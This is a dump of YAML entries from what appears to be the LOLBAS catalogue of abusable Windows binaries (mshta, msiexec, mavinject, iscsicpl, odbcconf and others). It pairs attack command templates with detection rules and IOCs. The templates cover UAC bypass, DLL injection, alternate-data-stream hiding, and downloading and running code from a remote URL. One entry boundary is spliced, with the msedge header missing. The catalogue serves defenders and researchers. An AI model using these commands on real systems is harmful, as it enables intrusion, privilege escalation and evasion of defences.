https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_instalutil_no_log_execution.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml Resources: - Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/ - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12 - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md - Link: https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/ - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ - Link: https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool Acknowledgement: - Person: Casey Smith Handle: '@subtee' - Person: Nir Chako (Pentera) Handle: '@C_h4ck_0' ================================================ FILE: yml/OSBinaries/Iscsicpl.yml ================================================ --- Name: iscsicpl.exe Description: Microsoft iSCSI Initiator Control Panel tool Author: Ekitji Created: 2025-08-17 Commands: - Command: c:\windows\syswow64\iscsicpl.exe # SysWOW64 binary Description: c:\windows\syswow64\iscsicpl.exe has a DLL injection through `C:\Users\\AppData\Local\Microsoft\WindowsApps\ISCSIEXE.dll`, resulting in UAC bypass. Usecase: Execute a custom DLL via a trusted high-integrity process without a UAC prompt. Category: UAC Bypass Privileges: User MitreID: T1548.002 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: DLL - Command: iscsicpl.exe # SysWOW64/System32 binary Description: Both `c:\windows\system32\iscsicpl.exe` and `c:\windows\system64\iscsicpl.exe` have UAC bypass through launching iscicpl.exe, then navigating into the Configuration tab, clicking Report, then launching your custom command. Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. Category: UAC Bypass Privileges: User MitreID: T1548.002 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD - Application: GUI Full_Path: - Path: c:\windows\system32\iscsicpl.exe # UAC Bypass by breaking out from application - Path: c:\windows\syswow64\iscsicpl.exe # UAC Bypass by DLL injection and breakout from application Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml - IOC: C:\Users\\AppData\Local\Microsoft\WindowsApps\ISCSIEXE.dll - IOC: Suspicious child process to iscsicpl.exe like cmd, powershell etc. Resources: - Link: https://learn.microsoft.com/en-us/windows-server/storage/iscsi/iscsi-initiator-portal - Link: https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC Acknowledgement: - Person: hacker.house - Person: Ekitji Handle: '@eki_erk' ================================================ FILE: yml/OSBinaries/Jsc.yml ================================================ --- Name: Jsc.exe Description: Binary file used by .NET to compile JavaScript code to .exe or .dll format Author: Oddvar Moe Created: 2019-05-31 Commands: - Command: jsc.exe {PATH:.js} Description: Use jsc.exe to compile JavaScript code stored in the provided .JS file and generate a .EXE file with the same name. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: JScript - Command: jsc.exe /t:library {PATH:.js} Description: Use jsc.exe to compile JavaScript code stored in the .JS file and generate a DLL file with the same name. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: JScript Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Jsc.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml - IOC: Jsc.exe should normally not run a system unless it is used for development. Resources: - Link: https://twitter.com/DissectMalware/status/998797808907046913 - Link: https://www.phpied.com/make-your-javascript-a-windows-exe/ Acknowledgement: - Person: Malwrologist Handle: '@DissectMalware' ================================================ FILE: yml/OSBinaries/Ldifde.yml ================================================ --- Name: Ldifde.exe Description: Creates, modifies, and deletes LDAP directory objects. Author: Grzegorz Tworek Created: 2022-08-31 Commands: - Command: Ldifde -i -f {PATH:.ldf} Description: Import specified .ldf file into LDAP. If the file contains http-based attrval-spec such as `thumbnailPhoto:< http://example.org/somefile.txt`, the file will be downloaded into IE temp folder. Usecase: Download file from Internet Category: Download Privileges: Administrator MitreID: T1105 OperatingSystem: Windows Server with AD Domain Services role, Windows 10 with AD LDS role. Full_Path: - Path: c:\windows\system32\ldifde.exe - Path: c:\windows\syswow64\ldifde.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/3d172914f6c2bd5c2b5ed471bf0657a662d395af/rules/windows/process_creation/proc_creation_win_ldifde_export.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/3d172914f6c2bd5c2b5ed471bf0657a662d395af/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/3d172914f6c2bd5c2b5ed471bf0657a662d395af/rules-emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml Resources: - Link: https://twitter.com/0gtweet/status/1564968845726580736 Acknowledgement: - Person: Grzegorz Tworek Handle: '@0gtweet' ================================================ FILE: yml/OSBinaries/Makecab.yml ================================================ --- Name: Makecab.exe Description: Binary to package existing files into a cabinet (.cab) file Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: makecab {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:autoruns.cab Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. Usecase: Hide data compressed into an alternate data stream Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Type: Compression - Command: makecab {PATH_SMB:.exe} {PATH_ABSOLUTE}:file.cab Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. Usecase: Hide data compressed into an alternate data stream Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Type: Compression - Command: makecab {PATH_SMB:.exe} {PATH_ABSOLUTE:.cab} Description: Download and compresses the target file and stores it in the target file. Usecase: Download file and compress into a cab file Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Type: Compression - Command: makecab /F {PATH:.ddf} Description: Execute makecab commands as defined in the specified Diamond Definition File (.ddf); see resources for the format specification. Usecase: Bypass command-line based detections Category: Execute Privileges: User MitreID: T1036 OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Type: Compression Full_Path: - Path: C:\Windows\System32\makecab.exe - Path: C:\Windows\SysWOW64\makecab.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml - IOC: Makecab retrieving files from Internet - IOC: Makecab storing data into alternate data streams Resources: - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f - Link: https://ss64.com/nt/makecab-directives.html - Link: https://www.pearsonhighered.com/assets/samplechapter/0/7/8/9/0789728583.pdf - Link: https://learn.microsoft.com/en-us/previous-versions/bb417343(v=msdn.10)#makecab-application Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ================================================ FILE: yml/OSBinaries/Mavinject.yml ================================================ --- Name: Mavinject.exe Description: Used by App-v in Windows Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: MavInject.exe 3110 /INJECTRUNNING {PATH_ABSOLUTE:.dll} Description: Inject evil.dll into a process with PID 3110. Usecase: Inject dll file into running process Category: Execute Privileges: User MitreID: T1218.013 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - Command: Mavinject.exe 4172 /INJECTRUNNING {PATH_ABSOLUTE}:file.dll Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172 Usecase: Inject dll file into running process Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL Full_Path: - Path: C:\Windows\System32\mavinject.exe - Path: C:\Windows\SysWOW64\mavinject.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml - IOC: mavinject.exe should not run unless APP-v is in use on the workstation Resources: - Link: https://twitter.com/gN3mes1s/status/941315826107510784 - Link: https://twitter.com/Hexcorn/status/776122138063409152 - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ Acknowledgement: - Person: Giuseppe N3mes1s Handle: '@gN3mes1s' - Person: Oddvar Moe Handle: '@oddvarmoe' ================================================ FILE: yml/OSBinaries/Microsoft.Workflow.Compiler.yml ================================================ --- Name: Microsoft.Workflow.Compiler.exe Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code. Author: Conor Richard Created: 2018-10-22 Commands: - Command: Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log} Description: Compile and execute C# or VB.net code in a XOML file referenced in the first argument (any extension accepted). Usecase: Compile and run code Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows 10S, Windows 11 Tags: - Execute: VB.Net - Execute: Csharp - Command: Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log} Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows 10S, Windows 11 Tags: - Execute: XOML - Command: Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log} Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code Category: AWL Bypass Privileges: User MitreID: T1127 OperatingSystem: Windows 10S, Windows 11 Tags: - Execute: XOML Full_Path: - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_workflow_compiler.yml - Splunk: https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml - Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations. - IOC: The presence of csc.exe or vbc.exe as child processes of Microsoft.Workflow.Compiler.exe - IOC: Presence of " {PATH:.b64} Description: Edge will silently download the file. File extension should be .html and binaries should be encoded. Usecase: Download file from the internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - Command: msedge.exe --disable-gpu-sandbox --gpu-launcher="{CMD} &&" Description: Edge spawns cmd.exe as a child process of msedge.exe and executes the specified command Usecase: Executes a process under a trusted Microsoft signed binary Category: Execute Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD Full_Path: - Path: c:\Program Files\Microsoft\Edge\Application\msedge.exe - Path: c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_msedge_arbitrary_download.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml Resources: - Link: https://twitter.com/mrd0x/status/1478116126005641220 - Link: https://twitter.com/mrd0x/status/1478234484881436672 Acknowledgement: - Person: mr.d0x Handle: '@mrd0x' ================================================ FILE: yml/OSBinaries/Mshta.yml ================================================ --- Name: Mshta.exe Description: Used by Windows to execute html applications. (.hta) Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: mshta.exe {PATH:.hta} Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. Usecase: Execute code Category: Execute Privileges: User MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: HTA - Execute: Remote - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:{REMOTEURL:.sct}"")")) Description: Executes VBScript supplied as a command line argument. Usecase: Execute code Category: Execute Privileges: User MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: VBScript - Command: mshta.exe javascript:a=GetObject("script:{REMOTEURL:.sct}").Exec();close(); Description: Executes JavaScript supplied as a command line argument. Usecase: Execute code Category: Execute Privileges: User MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: JScript - Command: mshta.exe "{PATH_ABSOLUTE}:file.hta" Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. Usecase: Execute code hidden in alternate data stream Category: ADS Privileges: User MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer) Tags: - Execute: HTA - Command: mshta.exe {REMOTEURL} Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Download: INetCache Full_Path: - Path: C:\Windows\System32\mshta.exe - Path: C:\Windows\SysWOW64\mshta.exe Code_Sample: - Code: https://gist.github.com/bohops/6ded40c4989c673f2e30b9a6c1985019 Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml - Elastic: https://github.com/elastic/detection-rules/blob/f8f643041a584621e66cf8e6d534ad3db92edc29/rules/windows/defense_evasion_mshta_beacon.toml - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/lateral_movement_dcom_hta.toml - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml - Splunk: https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/stories/suspicious_mshta_activity.yml - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_renamed.yml - Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_spawn.yml - Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_child_process.yml - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_url_in_command_line.yml - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - IOC: mshta.exe executing raw or obfuscated script within the command-line - IOC: General usage of HTA file - IOC: msthta.exe network connection to Internet/WWW resource - IOC: DotNet CLR libraries loaded into mshta.exe - IOC: DotNet CLR Usage Log - mshta.exe.log Resources: - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4 - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct - Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ Acknowledgement: - Person: Casey Smith Handle: '@subtee' - Person: Oddvar Moe Handle: '@oddvarmoe' - Person: Nir Chako (Pentera) Handle: '@C_h4ck_0' ================================================ FILE: yml/OSBinaries/Msiexec.yml ================================================ --- Name: Msiexec.exe Description: Used by Windows to execute msi files Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: msiexec /quiet /i {PATH:.msi} Description: Installs the target .MSI file silently. Usecase: Execute custom made msi file with attack code Category: Execute Privileges: User MitreID: T1218.007 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: MSI - Command: msiexec /q /i {REMOTEURL} Description: Installs the target remote & renamed .MSI file silently. Usecase: Execute custom made msi file with attack code from remote server Category: Execute Privileges: User MitreID: T1218.007 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: MSI - Execute: Remote - Command: msiexec /y {PATH_ABSOLUTE:.dll} Description: Calls DllRegisterServer to register the target DLL. Usecase: Execute dll files Category: Execute Privileges: User MitreID: T1218.007 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - Execute: Remote - Command: msiexec /z {PATH_ABSOLUTE:.dll} Description: Calls DllUnregisterServer to un-register the target DLL. Usecase: Execute dll files Category: Execute Privileges: User MitreID: T1218.007 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - Execute: Remote - Command: msiexec /i {PATH_ABSOLUTE:.msi} TRANSFORMS="{REMOTEURL:.mst}" /qb Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input. Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server Category: Execute Privileges: User MitreID: T1218.007 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: MSI - Execute: MST - Execute: Remote Full_Path: - Path: C:\Windows\System32\msiexec.exe - Path: C:\Windows\SysWOW64\msiexec.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml - Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/uninstall_app_using_msiexec.yml - IOC: msiexec.exe retrieving files from Internet Resources: - Link: https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/ - Link: https://twitter.com/PhilipTsukerman/status/992021361106268161 - Link: https://badoption.eu/blog/2023/10/03/MSIFortune.html Acknowledgement: - Person: netbiosX Handle: '@netbiosX' - Person: Philip Tsukerman Handle: '@PhilipTsukerman' ================================================ FILE: yml/OSBinaries/Netsh.yml ================================================ --- Name: Netsh.exe Description: Netsh is a Windows tool used to manipulate network interface settings. Author: Freddie Barr-Smith Created: 2019-12-24 Commands: - Command: netsh.exe add helper {PATH_ABSOLUTE:.dll} Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called Usecase: Proxy execution of .dll Category: Execute Privileges: Admin MitreID: T1546.007 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL Full_Path: - Path: C:\WINDOWS\System32\Netsh.exe - Path: C:\WINDOWS\SysWOW64\Netsh.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml - Splunk: https://github.com/splunk/security_content/blob/2b87b26bdc2a84b65b1355ffbd5174bdbdb1879c/detections/endpoint/processes_launching_netsh.yml - Splunk: https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/deprecated/processes_created_by_netsh.yml - IOC: Netsh initiating a network connection Resources: - Link: https://freddiebarrsmith.com/trix/trix.html - Link: https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html - Link: https://liberty-shell.com/sec/2018/07/28/netshlep/ Acknowledgement: - Person: 'Freddie Barr-Smith' Handle: - Person: 'Riccardo Spolaor' Handle: - Person: 'Mariano Graziano' Handle: - Person: 'Xabier Ugarte-Pedrero' Handle: ================================================ FILE: yml/OSBinaries/Ngen.yml ================================================ --- Name: Ngen.exe Description: Microsoft Native Image Generator. Author: Avihay Eldad Created: 2024-02-19 Commands: - Command: ngen.exe {REMOTEURL} Description: Downloads payload from remote server using the Microsoft Native Image Generator utility. Usecase: It will download a remote payload and place it in INetCache. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Tags: - Download: INetCache Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ngen.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe Acknowledgement: - Person: Avihay Eldad Handle: '@AvihayEldad' ================================================ FILE: yml/OSBinaries/Odbcconf.yml ================================================ --- Name: Odbcconf.exe Description: Used in Windows for managing ODBC connections Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: odbcconf /a {REGSVR {PATH_ABSOLUTE:.dll}} Description: Execute DllRegisterServer from DLL specified. Usecase: Execute a DLL file using technique that can evade defensive counter measures Category: Execute Privileges: User MitreID: T1218.008 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - Command: | odbcconf INSTALLDRIVER "lolbas-project|Driver={PATH_ABSOLUTE:.dll}|APILevel=2" odbcconf configsysdsn "lolbas-project" "DSN=lolbas-project" Description: Install a driver and load the DLL. Requires administrator privileges. Usecase: Execute dll file using technique that can evade defensive counter measures Category: Execute Privileges: User MitreID: T1218.008 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - Command: odbcconf -f {PATH:.rsp} Description: Load DLL specified in target .RSP file. See the Code Sample section for an example .RSP file. Usecase: Execute dll file using technique that can evade defensive counter measures Category: Execute Privileges: Administrator MitreID: T1218.008 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\odbcconf.exe - Path: C:\Windows\SysWOW64\odbcconf.exe Code_Sample: - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/58b5eb751379501aa237275f14381f0902e979a5/Archive-Old-Version/OSBinaries/Payload/file.rsp Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml Resources: - Link: https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b - Link: https://github.com/woanware/application-restriction-bypasses - Link: https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/ Acknowledgement: - Person: Casey Smith Handle: '@subtee' - Person: Adam Handle: '@Hexacorn' ================================================ FILE: yml/OSBinaries/OfflineScannerShell.yml ================================================ --- Name: OfflineScannerShell.exe Description: Windows Defender Offline Shell Author: 'Elliot Killick' Created: 2021-08-16 Commands: - Command: OfflineScannerShell Description: Execute mpclient.dll library in the current working directory Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: Execute Privileges: Administrator MitreID: T1218 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: DLL Full_Path: - Path: C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbas_offlinescannershell.yml - IOC: OfflineScannerShell.exe should not be run on a normal workstation Acknowledgement: - Person: Elliot Killick Handle: '@elliotkillick' ================================================ FILE: yml/OSBinaries/OneDriveStandaloneUpdater.yml ================================================ --- Name: OneDriveStandaloneUpdater.exe Description: OneDrive Standalone Updater Author: 'Elliot Killick' Created: 2021-08-22 Commands: - Command: OneDriveStandaloneUpdater Description: Download a file from the web address specified in `HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC`. `ODSUUpdateXMLUrlFromOC` and `UpdateXMLUrlFromOC` must be equal to non-empty string values in that same registry key. `UpdateOfficeConfigTimestamp` is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in `%localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json`. Usecase: Download a file from the Internet without executing any anomalous executables with suspicious arguments Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10 Full_Path: - Path: 'C:\Users\\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe' - Path: C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe - Path: C:\Program Files (x86)\Microsoft OneDrive\OneDriveStandaloneUpdater.exe Detection: - IOC: HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC being set to a suspicious non-Microsoft controlled URL - IOC: Reports of downloading from suspicious URLs in %localappdata%\OneDrive\setup\logs\StandaloneUpdate_*.log files - Sigma: https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml Resources: - Link: https://github.com/LOLBAS-Project/LOLBAS/pull/153 Acknowledgement: - Person: Elliot Killick Handle: '@elliotkillick' ================================================ FILE: yml/OSBinaries/Pcalua.yml ================================================ --- Name: Pcalua.exe Description: Program Compatibility Assistant Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: pcalua.exe -a {PATH:.exe} Description: Open the target .EXE using the Program Compatibility Assistant. Usecase: Proxy execution of binary Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - Command: pcalua.exe -a {PATH_SMB:.dll} Description: Open the target .DLL file with the Program Compatibilty Assistant. Usecase: Proxy execution of remote dll file Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: DLL - Execute: Remote - Command: pcalua.exe -a {PATH_ABSOLUTE:.cpl} -c Java Description: Open the target .CPL file with the Program Compatibility Assistant. Usecase: Execution of CPL files Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, 